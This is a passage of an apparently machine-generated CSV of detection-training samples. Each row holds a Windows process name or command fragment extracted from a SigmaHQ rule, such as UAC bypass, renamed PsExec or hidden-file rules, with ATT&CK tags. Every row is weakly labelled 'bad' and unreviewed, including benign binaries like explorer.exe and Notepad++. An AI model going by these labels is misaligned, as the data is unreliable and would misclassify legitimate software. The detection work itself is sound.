sample_id,text,normalized_text,label,surface_label,obfuscation_label,risk_class,label_source,source_family,source_repo,source_path,source_title,category,attack_tags,platform,confidence,needs_adjudication,notes,training_role,adjudication_reason,keep_for_training,adjudication_model,created_at,dataset_role,promotion_status 830017ee9dbddcfb51f1cf8b,rundll32,rundll32,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_rundll32_without_parameters.yml,Rundll32 Execution Without Parameters,process_creation,"[""attack.lateral-movement"", ""attack.t1021.002"", ""attack.t1570"", ""attack.execution"", ""attack.t1569.002""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f6e8fa681cd764b436af41bf,rundll32.exe,rundll32.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_rundll32_without_parameters.yml,Rundll32 Execution Without Parameters,process_creation,"[""attack.lateral-movement"", ""attack.t1021.002"", ""attack.t1570"", ""attack.execution"", ""attack.t1569.002""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 49b16c0ecdea38296ae5d504,C:\Windows\System32\lxss\wslhost.exe,C:\Windows\System32\lxss\wslhost.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_mstsc_remote_connection.yml,New Remote Desktop Connection Initiated Via Mstsc.EXE,process_creation,"[""attack.lateral-movement"", ""attack.t1021.001""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d83e0e22b69b41d6a90fda07,PowerShell.exe,PowerShell.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml,Uncommon Userinit Child Process,process_creation,"[""attack.privilege-escalation"", ""attack.t1037.001"", ""attack.persistence""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 05b40bce02d4984149b40ea0,megasync.exe,megasync.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_megasync.yml,Renamed MegaSync Execution,process_creation,"[""attack.defense-evasion"", ""attack.t1218""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1ff2af015b390ce050d0dd3f,C:\Program Files (x86)\Dell\UpdateService\ServiceShell.exe,C:\Program Files (x86)\Dell\UpdateService\ServiceShell.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml,Potentially Suspicious Cabinet File Expansion,process_creation,"[""attack.defense-evasion"", ""attack.t1218""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 05910c7b330d284d20860025,C:\PROGRA~1\WinZip\WZPREL~1.EXE,C:\PROGRA~1\WinZip\WZPREL~1.EXE,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml,Use NTFS Short Name in Image,process_creation,"[""attack.defense-evasion"", ""attack.t1564.004""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c08c017a72430ca328a7b3e9,C:\Windows\explorer.exe,C:\Windows\explorer.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml,Use NTFS Short Name in Image,process_creation,"[""attack.defense-evasion"", ""attack.t1564.004""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 32a5ff662cbf001b67efc8db,BOINC.exe,BOINC.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_boinc.yml,Renamed BOINC Client Execution,process_creation,"[""attack.defense-evasion"", ""attack.t1553""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 455b42a676b51552d90702cc,C:\Windows\System32\Dism.exe,C:\Windows\System32\Dism.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml,Use Short Name Path in Image,process_creation,"[""attack.defense-evasion"", ""attack.t1564.004""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4fbd946f39431655ba9a6655,C:\Windows\System32\cleanmgr.exe,C:\Windows\System32\cleanmgr.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml,Use Short Name Path in Image,process_creation,"[""attack.defense-evasion"", ""attack.t1564.004""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review dc7397b296c5974f0579d238,msteams.exe,msteams.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_msteams.yml,Renamed Microsoft Teams Execution,process_creation,"[""attack.defense-evasion""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review fa5be5b3f785b9dbd3c7ea21,teams.exe,teams.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_msteams.yml,Renamed Microsoft Teams Execution,process_creation,"[""attack.defense-evasion""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review fadb7fd4d7386226d765d65c,whoami.exe,whoami.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_whoami.yml,Renamed Whoami Execution,process_creation,"[""attack.discovery"", ""attack.t1033"", ""car.2016-03-001""]",windows,0.7,True,Sigma process_creation rule; status=test; level=critical,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 881f150e04b92fe568c9f36f,gpg.exe,gpg.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_gpg4win.yml,Renamed Gpg.EXE Execution,process_creation,"[""attack.impact"", ""attack.t1486""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 32938d55e5e02ab0f1cf3862,C:\Windows\System32\odbcconf.exe,C:\Windows\System32\odbcconf.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml,Suspicious Response File Execution Via Odbcconf.EXE,process_creation,"[""attack.defense-evasion"", ""attack.t1218.008""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 861c41b10c0585717e8931a5,C:\Windows\System32\runonce.exe,C:\Windows\System32\runonce.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml,Suspicious Response File Execution Via Odbcconf.EXE,process_creation,"[""attack.defense-evasion"", ""attack.t1218.008""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c58322419c89a0b32033dd0b,C:\Windows\SysWOW64\msiexec.exe,C:\Windows\SysWOW64\msiexec.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml,Change PowerShell Policies to an Insecure Level,process_creation,"[""attack.execution"", ""attack.t1059.001""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9b72c465831073ebb7878dff,C:\Windows\System32\msiexec.exe,C:\Windows\System32\msiexec.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml,Change PowerShell Policies to an Insecure Level,process_creation,"[""attack.execution"", ""attack.t1059.001""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 08c4cc803a02fac583279288,C:\Windows\SysWOW64\WerFault.exe,C:\Windows\SysWOW64\WerFault.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_sigverif_uncommon_child_process.yml,Uncommon Sigverif.EXE Child Process,process_creation,"[""attack.defense-evasion"", ""attack.t1216""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ac7f05d666c4941339ec04ce,C:\Windows\System32\WerFault.exe,C:\Windows\System32\WerFault.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_sigverif_uncommon_child_process.yml,Uncommon Sigverif.EXE Child Process,process_creation,"[""attack.defense-evasion"", ""attack.t1216""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 201067353da28b033875c478,C:\Windows\System32\services.exe,C:\Windows\System32\services.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml,Execution of Suspicious File Type Extension,process_creation,"[""attack.defense-evasion""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1a8781f8a56ad868661f2a6a,C:\Windows\explorer.exe,C:\Windows\explorer.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_customshellhost_susp_exec.yml,Suspicious CustomShellHost Execution,process_creation,"[""attack.defense-evasion"", ""attack.t1216""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 44f571c84d10fc8636662780,Cmd.EXE,Cmd.EXE,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_unicode_img.yml,Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image,process_creation,"[""attack.defense-evasion"", ""attack.t1027""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5d92ac03a3f0f6530553dbb6,PowerShell.EXE,PowerShell.EXE,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_unicode_img.yml,Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image,process_creation,"[""attack.defense-evasion"", ""attack.t1027""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ec73c40213968882527f4749,PowerShell_ISE.EXE,PowerShell_ISE.EXE,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_unicode_img.yml,Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image,process_creation,"[""attack.defense-evasion"", ""attack.t1027""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9d92a4466557bef7c71344cb,cscript.exe,cscript.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_unicode_img.yml,Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image,process_creation,"[""attack.defense-evasion"", ""attack.t1027""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 355c7f13ff65035d66170a82,pwsh.dll,pwsh.dll,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_unicode_img.yml,Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image,process_creation,"[""attack.defense-evasion"", ""attack.t1027""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b2023aca96e62738a97d62a8,wscript.exe,wscript.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_unicode_img.yml,Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image,process_creation,"[""attack.defense-evasion"", ""attack.t1027""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f3d94512ace1da58c94f07e1,csi.exe,csi.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_csi_use_of_csharp_console.yml,Suspicious Use of CSharp Interactive Console,process_creation,"[""attack.execution"", ""attack.defense-evasion"", ""attack.t1127""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9c1bb29500422e81264e6da3,"cmd.exe /c ""ver""","cmd.exe /c ""ver""",bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_arcsoc_susp_child_process.yml,Suspicious ArcSOC.exe Child Process,process_creation,"[""attack.execution"", ""attack.t1059"", ""attack.t1203""]",windows,0.7,True,Sigma process_creation rule; status=experimental; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6117190419a43fb8195e2a93,C:\Windows\System32\wpbbin.exe,C:\Windows\System32\wpbbin.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_wpbbin_potential_persistence.yml,UEFI Persistence Via Wpbbin - ProcessCreation,process_creation,"[""attack.persistence"", ""attack.defense-evasion"", ""attack.t1542.001""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 94c4433189ff05e08f6670c8,C:\Program Files (x86)\ManageEngine\uems_agent\bin\dcfaservice64.exe,C:\Program Files (x86)\ManageEngine\uems_agent\bin\dcfaservice64.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_fltmc_unload_driver.yml,Filter Driver Unloaded Via Fltmc.EXE,process_creation,"[""attack.defense-evasion"", ""attack.t1070"", ""attack.t1562"", ""attack.t1562.002""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4212120ebaf14f028fa4a587,C:\Windows\PSEXESVC.exe,C:\Windows\PSEXESVC.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_sysinternals_psexec_service.yml,Renamed PsExec Service Execution,process_creation,"[""attack.execution""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review dac47c84954723ee63cd2595,psexesvc.exe,psexesvc.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_sysinternals_psexec_service.yml,Renamed PsExec Service Execution,process_creation,"[""attack.execution""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f9cfed575b2385ab3633ff5e,C:\Windows\System32\conhost.exe,C:\Windows\System32\conhost.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml,WMI Backdoor Exchange Transport Agent,process_creation,"[""attack.privilege-escalation"", ""attack.persistence"", ""attack.t1546.003""]",windows,0.7,True,Sigma process_creation rule; status=test; level=critical,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1a5301ab938e555a9a70c876,C:\Hexnode\Hexnode Agent\Current\HexnodeAgent.exe,C:\Hexnode\Hexnode Agent\Current\HexnodeAgent.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml,Allow Service Access Using Security Descriptor Tampering Via Sc.EXE,process_creation,"[""attack.privilege-escalation"", ""attack.persistence"", ""attack.t1543.003""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9e9e0c039827544ece3622c2,C:\Windows\System32\inetsrv\iissetup.exe,C:\Windows\System32\inetsrv\iissetup.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml,IIS Native-Code Module Command Line Installation,process_creation,"[""attack.persistence"", ""attack.t1505.003""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 55fae4ea631490f54e935225,"""C:\Windows\system32\msconfig.exe"" -5","""C:\Windows\system32\msconfig.exe"" -5",bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml,UAC Bypass Using MSConfig Token Modification - Process,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1548.002""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0ebd4a8c5c282c80a75624de,C:\Windows\System32\cmd.exe,C:\Windows\System32\cmd.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_susp_embed_exe_lnk.yml,Hidden Powershell in Link File Pattern,process_creation,"[""attack.execution"", ""attack.t1059.001""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 97c31c97c77b2ea2b903afb3,C:\Windows\explorer.exe,C:\Windows\explorer.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_susp_embed_exe_lnk.yml,Hidden Powershell in Link File Pattern,process_creation,"[""attack.execution"", ""attack.t1059.001""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 58ae67d87fcb20127227a954,C:\Windows\CCM\Ccm32BitLauncher.exe,C:\Windows\CCM\Ccm32BitLauncher.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml,Msiexec Quiet Installation,process_creation,"[""attack.defense-evasion"", ""attack.t1218.007""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c731e4927c63c2c7d32d6035,C:\ProgramData\chocolatey\choco.exe,C:\ProgramData\chocolatey\choco.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml,Csc.EXE Execution Form Potentially Suspicious Parent,process_creation,"[""attack.execution"", ""attack.t1059.005"", ""attack.t1059.007"", ""attack.defense-evasion"", ""attack.t1218.005"", ""attack.t1027.004""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 08fe8bfd33b39f9bbacd67a8,C:\Windows\System32\inetsrv\w3wp.exe,C:\Windows\System32\inetsrv\w3wp.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml,Csc.EXE Execution Form Potentially Suspicious Parent,process_creation,"[""attack.execution"", ""attack.t1059.005"", ""attack.t1059.007"", ""attack.defense-evasion"", ""attack.t1218.005"", ""attack.t1027.004""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 71347d41252074787414b501,C:\Windows\System32\sdiagnhost.exe,C:\Windows\System32\sdiagnhost.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml,Csc.EXE Execution Form Potentially Suspicious Parent,process_creation,"[""attack.execution"", ""attack.t1059.005"", ""attack.t1059.007"", ""attack.defense-evasion"", ""attack.t1218.005"", ""attack.t1027.004""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 005be97dfccffa648228b510,C:\Windows\PSEXESVC.exe,C:\Windows\PSEXESVC.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml,PsExec Service Child Process Execution as LOCAL SYSTEM,process_creation,"[""attack.execution""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9dabf256096bdba111d2e76a,schtasks.exe,schtasks.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_schtasks_execution.yml,Renamed Schtasks Execution,process_creation,"[""attack.defense-evasion"", ""attack.execution"", ""attack.persistence"", ""attack.privilege-escalation"", ""attack.t1036.003"", ""attack.t1053.005""]",windows,0.7,True,Sigma process_creation rule; status=experimental; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f7011ec6965073d92b1813ae,PowerShell.EXE,PowerShell.EXE,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_powershell_decrypt_pattern.yml,PowerShell Execution With Potential Decryption Capabilities,process_creation,"[""attack.execution""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d0fb0734878c66dd14aebecf,pwsh.dll,pwsh.dll,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_powershell_decrypt_pattern.yml,PowerShell Execution With Potential Decryption Capabilities,process_creation,"[""attack.execution""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7b8b6bde3ec7d696626847b2,C:\Windows\System32\control.exe,C:\Windows\System32\control.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_susp_workfolders.yml,Execution via WorkFolders.exe,process_creation,"[""attack.defense-evasion"", ""attack.t1218""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 87d4217c1be3424b2f8bdaff,C:\Program Files (x86)\Notepad++\notepad++.exe,C:\Program Files (x86)\Notepad++\notepad++.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_dotnet_arbitrary_dll_csproj_execution.yml,Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE,process_creation,"[""attack.defense-evasion"", ""attack.t1218""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 38960aa51952f54478f30fd4,C:\Program Files\Notepad++\notepad++.exe,C:\Program Files\Notepad++\notepad++.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_dotnet_arbitrary_dll_csproj_execution.yml,Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE,process_creation,"[""attack.defense-evasion"", ""attack.t1218""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2602ffd7377355d606abe245,C:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc,C:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml,Gpscript Execution,process_creation,"[""attack.defense-evasion"", ""attack.t1218""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c5bdc4b4076bebb85164ddfe,ftp.exe,ftp.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_ftp.yml,Renamed FTP.EXE Execution,process_creation,"[""attack.execution"", ""attack.t1059"", ""attack.defense-evasion"", ""attack.t1202""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 58da6fcf36428f1d853b5dcf,C:\Windows\System32\wbem\WmiPrvSE.exe,C:\Windows\System32\wbem\WmiPrvSE.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_mofcomp_execution.yml,Potential Suspicious Mofcomp Execution,process_creation,"[""attack.defense-evasion"", ""attack.t1218""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 87a78124dffcca69441dbcbc,vmnat.exe,vmnat.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml,Renamed Vmnat.exe Execution,process_creation,"[""attack.privilege-escalation"", ""attack.persistence"", ""attack.defense-evasion"", ""attack.t1574.001""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c6bd5656787e0c02e9c776b9,bash.exe,bash.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_bash_file_execution.yml,Indirect Command Execution From Script File Via Bash.EXE,process_creation,"[""attack.defense-evasion"", ""attack.t1202""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4248ca97dae7a6acf178251f,Microsoft.NodejsTools.PressAnyKey.exe,Microsoft.NodejsTools.PressAnyKey.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_pressanykey.yml,Visual Studio NodejsTools PressAnyKey Renamed Execution,process_creation,"[""attack.execution"", ""attack.defense-evasion"", ""attack.t1218""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 43d346f49a88fff0cbab778e,C:\Windows\System32\lxss\wslhost.exe,C:\Windows\System32\lxss\wslhost.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml,Mstsc.EXE Execution With Local RDP File,process_creation,"[""attack.command-and-control"", ""attack.t1219.002""]",windows,0.6,True,Sigma process_creation rule; status=test; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ac13583f3f7deab3e3214daa,msdt.exe,msdt.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_msdt.yml,Renamed Msdt.EXE Execution,process_creation,"[""attack.defense-evasion"", ""attack.t1036.003""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review cc6259d67399cc6e56f1c448,+R +H +S +A \\\*.cui,+R +H +S +A \\\*.cui,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_attrib_hiding_files.yml,Hiding Files with Attrib.exe,process_creation,"[""attack.defense-evasion"", ""attack.t1564.001""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e8826730e510a0374fd1fb43,C:\\WINDOWS\\system32\\\*.bat,C:\\WINDOWS\\system32\\\*.bat,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_attrib_hiding_files.yml,Hiding Files with Attrib.exe,process_creation,"[""attack.defense-evasion"", ""attack.t1564.001""]",windows,0.6,True,Sigma process_creation rule; status=test; 